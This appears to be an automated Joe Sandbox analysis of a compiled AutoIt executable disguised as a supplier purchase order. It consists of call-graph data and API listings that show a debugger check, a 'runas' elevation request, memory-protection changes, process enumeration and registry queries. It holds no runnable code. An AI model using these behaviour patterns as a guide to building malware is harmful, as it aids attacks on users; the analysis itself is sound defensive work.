eaca8e 48 API calls 108072->108073 108076 ef01a1 108073->108076 108075 eaca8e 48 API calls 108074->108075 108075->108076 108076->107614 108078 ea84a6 81 API calls 108077->108078 108079 f017c7 108078->108079 108080 ee6f5b 63 API calls 108079->108080 108081 f017d8 108080->108081 108081->107614 108082->107614 108083->107614 108084->107614 108085->107614 108086->107614 108087->107613 108088->107606 108089->107587 108090->107586 108091->107592 108092->107600 108094 ead3d2 48 API calls 108093->108094 108095 eff389 Mailbox 108094->108095 108096 eff3cd 108095->108096 108097 eff3e1 108095->108097 108113 eff3a9 108095->108113 108099 ea7e53 48 API calls 108096->108099 108100 eac935 48 API calls 108097->108100 108098 ead89e 50 API calls 108103 eff421 Mailbox 108098->108103 108101 eff3df 108099->108101 108100->108101 108102 eff429 108101->108102 108231 efcdb5 417 API calls 108101->108231 108225 efcd12 108102->108225 108103->107716 108106 eff410 108106->108102 108108 eff414 108106->108108 108107 eff44b 108110 eff457 108107->108110 108111 eff4a2 108107->108111 108232 eed338 86 API calls 4 library calls 108108->108232 108110->108113 108114 eff476 108110->108114 108112 eff34f 417 API calls 108111->108112 108112->108103 108113->108098 108115 eaca8e 48 API calls 108114->108115 108115->108103 108116->107718 108117->107751 108118->107751 108119->107717 108120->107751 108121->107719 108122->107717 108123->107717 108124->107732 108125->107767 108127 eb469f 108126->108127 108128 eb4537 108126->108128 108131 eacaee 48 API calls 108127->108131 108129 f17820 108128->108129 108130 eb4543 108128->108130 108469 efe713 417 API calls Mailbox 108129->108469 108297 eb4040 108130->108297 108138 eb45e4 Mailbox 108131->108138 108134 eb4639 Mailbox 108134->107716 108135 f1782c 108135->108134 108470 eed520 86 API calls 4 library calls 108135->108470 108137 eb4559 108137->108134 108137->108135 108137->108138 108144 f01f19 132 API calls 108138->108144 108312 ef1080 108138->108312 108315 ef6fc3 
108138->108315 108318 ef95af WSAStartup 108138->108318 108320 eedce9 108138->108320 108325 ea50ec 108138->108325 108329 f0352a 108138->108329 108417 eeefcd 108138->108417 108451 ef9500 108138->108451 108460 ebf55e 108138->108460 108144->108134 108149->107759 108150->107766 108151->107770 109007 eaa9a0 108152->109007 108154 eb36e7 108155 eb3778 108154->108155 108156 f1a269 108154->108156 108212 eb3aa8 108154->108212 109019 ebbc04 86 API calls 108155->109019 109024 eed520 86 API calls 4 library calls 108156->109024 108161 f1a3e9 109029 eed520 86 API calls 4 library calls 108161->109029 108162 eb3793 108162->108212 108214 eb396b Mailbox _memmove 108162->108214 108216 f1a68d 108162->108216 109012 ea10e8 108162->109012 108166 f1a583 108169 eafa40 417 API calls 108166->108169 108167 f1a45c 109033 eed520 86 API calls 4 library calls 108167->109033 108168 f1a289 108168->108161 108170 ead2d2 53 API calls 108168->108170 108172 f1a5b5 108169->108172 108173 f1a2fb 108170->108173 108182 ead380 55 API calls 108172->108182 108172->108212 108176 f1a303 108173->108176 108177 f1a40f 108173->108177 108174 eb384e 108179 f1a60c 108174->108179 108180 eb38e5 108174->108180 108174->108214 108190 f1a317 108176->108190 108198 f1a341 108176->108198 109030 ebcf79 49 API calls 108177->109030 109038 eed231 50 API calls 108179->109038 108185 ec010a 48 API calls 108180->108185 108186 f1a5e6 108182->108186 109037 eed520 86 API calls 4 library calls 108186->109037 108187 eafa40 417 API calls 108187->108214 108189 f1a42c 109025 eed520 86 API calls 4 library calls 108190->109025 108191 ebbc5c 48 API calls 108191->108214 108199 f1a366 108198->108199 108203 f1a384 108198->108203 108200 ead89e 50 API calls 108200->108214 108208 eb399f 108209 eac935 48 API calls 108208->108209 108210 eb39c0 108208->108210 108209->108210 108210->108212 108215 f1a65e 108210->108215 108218 eb3a05 108210->108218 108211 ec010a 48 API calls 108211->108214 108221 eb3ab5 Mailbox 108212->108221 109023 eed520 86 API calls 4 
110728 f1ac4a Mailbox 110726->110728 110797 eeba5d 48 API calls 110726->110797 110800 eed520 86 API calls 4 library calls 110728->110800 110729 ec010a 48 API calls 110729->110763 110731 eb105e 110741 eac935 48 API calls 110731->110741 110732 eb0119 110803 eed520 86 API calls 4 library calls 110732->110803 110734 eb1063 110802 eed520 86 API calls 4 library calls 110734->110802 110735 eac935 48 API calls 110735->110763 110736 eb0dee 110738 ead89e 50 API calls 110736->110738 110739 eb0dfa 110738->110739 110743 ead89e 50 API calls 110739->110743 110740 f1b772 110804 eed520 86 API calls 4 library calls 110740->110804 110756 eafbf1 Mailbox 110741->110756 110742 eaf6d0 417 API calls 110742->110763 110745 eb0e83 110743->110745 110750 eacaee 48 API calls 110745->110750 110746 eda599 InterlockedDecrement 110746->110763 110747 ead3d2 48 API calls 110747->110763 110749 f1b7d2 110759 eb10f1 Mailbox 110750->110759 110752 ec1b2a 52 API calls __cinit 110752->110763 110754 eb1230 110754->110756 110801 eed520 86 API calls 4 library calls 110754->110801 110757 eafa40 417 API calls 110757->110763 110799 eed520 86 API calls 4 library calls 110759->110799 110761 f1b583 110798 eed520 86 API calls 4 library calls 110761->110798 110763->110729 110763->110731 110763->110732 110763->110734 110763->110735 110763->110736 110763->110739 110763->110740 110763->110742 110763->110745 110763->110746 110763->110747 110763->110752 110763->110754 110763->110756 110763->110757 110763->110759 110763->110761 110764 ef936f 55 API calls 110763->110764 110765 efb74b 417 API calls 110763->110765 110766 ebef0d 94 API calls 110763->110766 110767 ea50a3 49 API calls 110763->110767 110768 f01f19 132 API calls 110763->110768 110769 ebf461 98 API calls 110763->110769 110770 ef8065 55 API calls 110763->110770 110771 f00bfa 129 API calls 110763->110771 110772 ef9122 91 API calls 110763->110772 110773 ef92c0 88 API calls 110763->110773 110774 ebdd84 3 API calls 110763->110774 110775 ef013f 87 API calls 110763->110775 
110776 ebf03e 2 API calls 110763->110776 110777 f010e5 82 API calls 110763->110777 110778 f017aa 87 API calls 110763->110778 110779 f030ad 93 API calls 110763->110779 110780 f0798d 109 API calls 110763->110780 110781 f0804e 113 API calls 110763->110781 110791 eb1620 59 API calls Mailbox 110763->110791 110792 efee52 82 API calls 2 library calls 110763->110792 110793 efef9d 90 API calls Mailbox 110763->110793 110794 eeb020 48 API calls 110763->110794 110795 efe713 417 API calls Mailbox 110763->110795 110764->110763 110765->110763 110766->110763 110767->110763 110768->110763 110769->110763 110770->110763 110771->110763 110772->110763 110773->110763 110774->110763 110775->110763 110776->110763 110777->110763 110778->110763 110779->110763 110780->110763 110781->110763 110783 ebe022 110782->110783 110784 ebe034 110782->110784 110785 ead89e 50 API calls 110783->110785 110786 ebe03a 110784->110786 110787 ebe063 110784->110787 110790 ebe02c 110785->110790 110789 ec010a 48 API calls 110786->110789 110788 ead89e 50 API calls 110787->110788 110788->110790 110789->110790 110790->110719 110791->110763 110792->110763 110793->110763 110794->110763 110795->110763 110796->110726 110797->110728 110798->110759 110799->110756 110800->110725 110801->110734 110802->110732 110803->110740 110804->110749 110805 f1bc25 110806 f1bc27 110805->110806 110809 ee79f8 SHGetFolderPathW 110806->110809 110808 f1bc30 110808->110808 110810 ea7e53 48 API calls 110809->110810 110811 ee7a25 110810->110811 110811->110808 110812 f1c146 GetUserNameW 110813 f11e8b 110818 ebe44f 110813->110818 110817 f11e9a 110819 ec010a 48 API calls 110818->110819 110820 ebe457 110819->110820 110821 ebe46b 110820->110821 110826 ebe74b 110820->110826 110825 ec1b2a 52 API calls __cinit 110821->110825 110825->110817 110827 ebe463 110826->110827 110828 ebe754 110826->110828 110830 ebe47b 110827->110830 110858 ec1b2a 52 API calls __cinit 110828->110858 110831 ead3d2 48 API calls 110830->110831 110832 ebe492 GetVersionExW 
110831->110832 110833 ea7e53 48 API calls 110832->110833 110834 ebe4d5 110833->110834 110859 ebe5f8 110834->110859 110837 ebe617 48 API calls 110838 ebe4e9 110837->110838 110841 f129f9 110838->110841 110863 ebe6d1 110838->110863 110842 ebe55f GetCurrentProcess 110872 ebe70e LoadLibraryA GetProcAddress 110842->110872 110843 ebe576 110845 ebe59e 110843->110845 110846 ebe5ec GetSystemInfo 110843->110846 110866 ebe694 110845->110866 110847 ebe5c9 110846->110847 110849 ebe5dc 110847->110849 110850 ebe5d7 FreeLibrary 110847->110850 110849->110821 110850->110849 110852 ebe5e4 GetSystemInfo 110854 ebe5be 110852->110854 110853 ebe5b4 110869 ebe437 110853->110869 110854->110847 110856 ebe5c4 FreeLibrary 110854->110856 110856->110847 110858->110827 110860 ebe601 110859->110860 110861 eaa2fb 48 API calls 110860->110861 110862 ebe4dd 110861->110862 110862->110837 110873 ebe6e3 110863->110873 110877 ebe6a6 110866->110877 110870 ebe694 2 API calls 110869->110870 110871 ebe43f GetNativeSystemInfo 110870->110871 110871->110854 110872->110843 110874 ebe55b 110873->110874 110875 ebe6ec LoadLibraryA 110873->110875 110874->110842 110874->110843 110875->110874 110876 ebe6fd GetProcAddress 110875->110876 110876->110874 110878 ebe5ac 110877->110878 110879 ebe6af LoadLibraryA 110877->110879 110878->110852 110878->110853 110879->110878 110880 ebe6c0 GetProcAddress 110879->110880 110880->110878 110881 f11eca 110886 ebbe17 110881->110886 110885 f11ed9 110887 ead3d2 48 API calls 110886->110887 110888 ebbe85 110887->110888 110895 ebc929 110888->110895 110890 f1db92 110892 ebbf22 110892->110890 110893 ebbf3e 110892->110893 110898 ebc8b7 48 API calls _memmove 110892->110898 110894 ec1b2a 52 API calls __cinit 110893->110894 110894->110885 110899 ebc955 110895->110899 110898->110892 110900 ebc948 110899->110900 110901 ebc962 110899->110901 110900->110892 110901->110900 110902 ebc969 RegOpenKeyExW 110901->110902 110902->110900 110903 ebc983 RegQueryValueExW 110902->110903 110904 ebc9b9 RegCloseKey 
110903->110904 110905 ebc9a4 110903->110905 110904->110900 110905->110904 110906 f11eed 110911 ebe975 110906->110911 110908 f11f01 110927 ec1b2a 52 API calls __cinit 110908->110927 110910 f11f0b 110912 ec010a 48 API calls 110911->110912 110913 ebea27 GetModuleFileNameW 110912->110913 110914 ec297d __wsplitpath 47 API calls 110913->110914 110915 ebea5b _wcsncat 110914->110915 110928 ec2bff 110915->110928 110918 ec010a 48 API calls 110919 ebea94 _wcscpy 110918->110919 110920 ead3d2 48 API calls 110919->110920 110921 ebeacf 110920->110921 110931 ebeb05 110921->110931 110923 ebeae0 Mailbox 110923->110908 110924 eaa4f6 48 API calls 110926 ebeada _wcscat __NMSG_WRITE _wcsncpy 110924->110926 110925 ec010a 48 API calls 110925->110926 110926->110923 110926->110924 110926->110925 110927->110910 110945 ecaab9 110928->110945 110932 eac4cd 48 API calls 110931->110932 110933 ebeb14 RegOpenKeyExW 110932->110933 110934 f14b17 RegQueryValueExW 110933->110934 110935 ebeb35 110933->110935 110936 f14b91 RegCloseKey 110934->110936 110937 f14b30 110934->110937 110935->110926 110938 ec010a 48 API calls 110937->110938 110939 f14b49 110938->110939 110940 ea4bce 48 API calls 110939->110940 110941 f14b53 RegQueryValueExW 110940->110941 110942 f14b86 110941->110942 110943 f14b6f 110941->110943 110942->110936 110944 ea7e53 48 API calls 110943->110944 110944->110942 110946 ecaaca 110945->110946 110947 ecabc6 110945->110947 110946->110947 110953 ecaad5 110946->110953 110955 ec889e 47 API calls __getptd_noexit 110947->110955 110949 ecabbb 110956 ec7aa0 8 API calls _fseek 110949->110956 110952 ebea8a 110952->110918 110953->110952 110954 ec889e 47 API calls __getptd_noexit 110953->110954 110954->110949 110955->110949 110956->110952 110957 eb0ff7 110958 ebe016 50 API calls 110957->110958 110959 eb100d 110958->110959 111014 ebe08f 110959->111014 110961 eb103d 110978 eafbf1 Mailbox 110961->110978 111033 eed520 86 API calls 4 library calls 110961->111033 110965 eb105e 110973 eac935 48 API calls 
110965->110973 110966 eb1063 111034 eed520 86 API calls 4 library calls 110966->111034 110967 eb0dee 110969 ead89e 50 API calls 110967->110969 110970 eb0dfa 110969->110970 110976 ead89e 50 API calls 110970->110976 110971 f1b772 111036 eed520 86 API calls 4 library calls 110971->111036 110972 eb0119 111035 eed520 86 API calls 4 library calls 110972->111035 110973->110978 110974 eaf6d0 417 API calls 110982 eafad8 Mailbox _memmove 110974->110982 110975 eac935 48 API calls 110975->110982 110977 eb0e83 110976->110977 110985 eacaee 48 API calls 110977->110985 110979 ead3d2 48 API calls 110979->110982 110981 eda599 InterlockedDecrement 110981->110982 110982->110961 110982->110965 110982->110966 110982->110967 110982->110970 110982->110971 110982->110972 110982->110974 110982->110975 110982->110977 110982->110978 110982->110979 110982->110981 110984 ec1b2a 52 API calls __cinit 110982->110984 110986 eb10f1 Mailbox 110982->110986 110990 ec010a 48 API calls 110982->110990 110991 eafa40 417 API calls 110982->110991 110994 f1b583 110982->110994 110996 ef936f 55 API calls 110982->110996 110997 efb74b 417 API calls 110982->110997 110998 ebef0d 94 API calls 110982->110998 110999 ea50a3 49 API calls 110982->110999 111000 f01f19 132 API calls 110982->111000 111001 ebf461 98 API calls 110982->111001 111002 ef8065 55 API calls 110982->111002 111003 f00bfa 129 API calls 110982->111003 111004 ef9122 91 API calls 110982->111004 111005 ef92c0 88 API calls 110982->111005 111006 ebdd84 3 API calls 110982->111006 111007 ef013f 87 API calls 110982->111007 111008 ebf03e 2 API calls 110982->111008 111009 f010e5 82 API calls 110982->111009 111010 f017aa 87 API calls 110982->111010 111011 f030ad 93 API calls 110982->111011 111012 f0798d 109 API calls 110982->111012 111013 f0804e 113 API calls 110982->111013 111026 eb1620 59 API calls Mailbox 110982->111026 111027 efee52 82 API calls 2 library calls 110982->111027 111028 efef9d 90 API calls Mailbox 110982->111028 111029 eeb020 48 API calls 
110982->111029 111030 efe713 417 API calls Mailbox 110982->111030 110983 f1b7d2 110984->110982 110985->110986 111032 eed520 86 API calls 4 library calls 110986->111032 110990->110982 110991->110982 111031 eed520 86 API calls 4 library calls 110994->111031 110996->110982 110997->110982 110998->110982 110999->110982 111000->110982 111001->110982 111002->110982 111003->110982 111004->110982 111005->110982 111006->110982 111007->110982 111008->110982 111009->110982 111010->110982 111011->110982 111012->110982 111013->110982 111037 ea7b6e 48 API calls 111014->111037 111016 ebe0b4 _wcscmp 111017 eacaee 48 API calls 111016->111017 111019 ebe0e2 Mailbox 111016->111019 111018 f1b9c7 111017->111018 111038 ea7b4b 48 API calls Mailbox 111018->111038 111019->110982 111021 f1b9d5 111022 ead2d2 53 API calls 111021->111022 111023 f1b9e7 111022->111023 111024 ead89e 50 API calls 111023->111024 111025 f1b9ec Mailbox 111023->111025 111024->111025 111025->110982 111026->110982 111027->110982 111028->110982 111029->110982 111030->110982 111031->110986 111032->110978 111033->110966 111034->110972 111035->110971 111036->110983 111037->111016 111038->111021 111039 eae834 111040 eb2b40 417 API calls 111039->111040 111041 eae840 111040->111041

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00EA376D
                                                                                                                                    • Part of subcall function 00EA4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00000000,00000001,00000000), ref: 00EA428C
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?), ref: 00EA377F
                                                                                                                                  • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00F61120,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00F61124,?,?), ref: 00EA37EE
                                                                                                                                    • Part of subcall function 00EA34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00EA352A
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA3860
                                                                                                                                  • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00F52934,00000010), ref: 00F121C5
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00F121FD
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00F12232
                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F3DAA4), ref: 00F12290
                                                                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00F12297
                                                                                                                                    • Part of subcall function 00EA30A5: GetSysColorBrush.USER32(0000000F), ref: 00EA30B0
                                                                                                                                    • Part of subcall function 00EA30A5: LoadCursorW.USER32(00000000,00007F00), ref: 00EA30BF
                                                                                                                                    • Part of subcall function 00EA30A5: LoadIconW.USER32(00000063), ref: 00EA30D5
                                                                                                                                    • Part of subcall function 00EA30A5: LoadIconW.USER32(000000A4), ref: 00EA30E7
                                                                                                                                    • Part of subcall function 00EA30A5: LoadIconW.USER32(000000A2), ref: 00EA30F9
                                                                                                                                    • Part of subcall function 00EA30A5: RegisterClassExW.USER32(?), ref: 00EA3167
                                                                                                                                    • Part of subcall function 00EA2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EA2ECB
                                                                                                                                    • Part of subcall function 00EA2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EA2EEC
                                                                                                                                    • Part of subcall function 00EA2E9D: ShowWindow.USER32(00000000), ref: 00EA2F00
                                                                                                                                    • Part of subcall function 00EA2E9D: ShowWindow.USER32(00000000), ref: 00EA2F09
                                                                                                                                    • Part of subcall function 00EA3598: _memset.LIBCMT ref: 00EA35BE
                                                                                                                                    • Part of subcall function 00EA3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EA3667
                                                                                                                                  Strings
                                                                                                                                  • runas, xrefs: 00F1228B
                                                                                                                                  • C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe, xrefs: 00EA37B4, 00EA37E9, 00EA37FD, 00F12257
                                                                                                                                  • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 00F121BE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                  • String ID: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                  • API String ID: 4253510256-2170441157
                                                                                                                                  • Opcode ID: e5a1cb756e74a16134b1cbed4e514826ccb266b38b0aff5000f862eef779ee8f
                                                                                                                                  • Instruction ID: c7d87a7a1ddf24437fcda6e1bf093e8285fbd4b09eab8cf7845fcc625b68a4d6
                                                                                                                                  • Opcode Fuzzy Hash: e5a1cb756e74a16134b1cbed4e514826ccb266b38b0aff5000f862eef779ee8f
                                                                                                                                  • Instruction Fuzzy Hash: 5A513B70604248BBDB10EBB0DC46BED77BCAB1B710F14115AF751BA1D1C6B09A85FB22

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0317F
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00F0321E
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F032B6
                                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F034F5
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F03502
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                  • Opcode ID: 1ce82abe8cbd909a4b8629581cf3c1f6659264feea94cc0fd51f00c579ec95c4
                                                                                                                                  • Instruction ID: a4b5e3f1c70a0b68ead66871c7046f17f7a5bbd5c6c48fe82d1a6a3e7f9ef43d
                                                                                                                                  • Opcode Fuzzy Hash: 1ce82abe8cbd909a4b8629581cf3c1f6659264feea94cc0fd51f00c579ec95c4
                                                                                                                                  • Instruction Fuzzy Hash: 2CE17E75604210AFCB14DF25CD95E2ABBE9EF89324F04846DF44ADB2A1DB31ED01EB52

                                                                                                                                  APIs
                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00EA2A33
                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00EA2A5D
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EA2A80
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00EA2A8B
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00EA2A9F
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00EA2AAE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                  • String ID: TaskbarCreated
                                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00EBE4A7
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00F3DC28,?,?), ref: 00EBE567
                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,00F3DC28,?,?), ref: 00EBE5BC
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EBE5C7
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EBE5DA
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00F3DC28,?,?), ref: 00EBE5E4
                                                                                                                                  • GetSystemInfo.KERNEL32(?,00F3DC28,?,?), ref: 00EBE5F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2717633055-0
                                                                                                                                  APIs
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EA3202
                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00EA3219
                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00F157D7
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00F157EC
                                                                                                                                  • LockResource.KERNEL32(?), ref: 00F157FF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                  • String ID: SCRIPT
                                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EE6F7D
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EE6F8D
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EE6FAC
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EE6FD0
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6FE3
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EE7022
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1605983538-0
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 010021EA
                                                                                                                                  • GetProcAddress.KERNEL32(?,00FFBFF9), ref: 01002208
                                                                                                                                  • ExitProcess.KERNEL32(?,00FFBFF9), ref: 01002219
                                                                                                                                  • VirtualProtect.KERNEL32(00EA0000,00001000,00000004,?,00000000), ref: 01002267
                                                                                                                                  • VirtualProtect.KERNEL32(00EA0000,00001000), ref: 0100227C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1996367037-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00EE78CB
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EEF04D
                                                                                                                                  • CoCreateInstance.COMBASE(00F2DA7C,00000000,00000001,00F2D8EC,?), ref: 00EEF066
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EEF083
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                  • String ID: .lnk
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                  • _memmove.LIBCMT ref: 00EB2C63
                                                                                                                                  • _memmove.LIBCMT ref: 00EB303A
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                  • String ID: @
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: G-
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNEL32(00EAC848,00EAC848), ref: 00EBDDA2
                                                                                                                                  • FindFirstFileW.KERNEL32(00EAC848,?), ref: 00F14A83
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NameUser
                                                                                                                                  • String ID:
                                                                                                                                  APIs
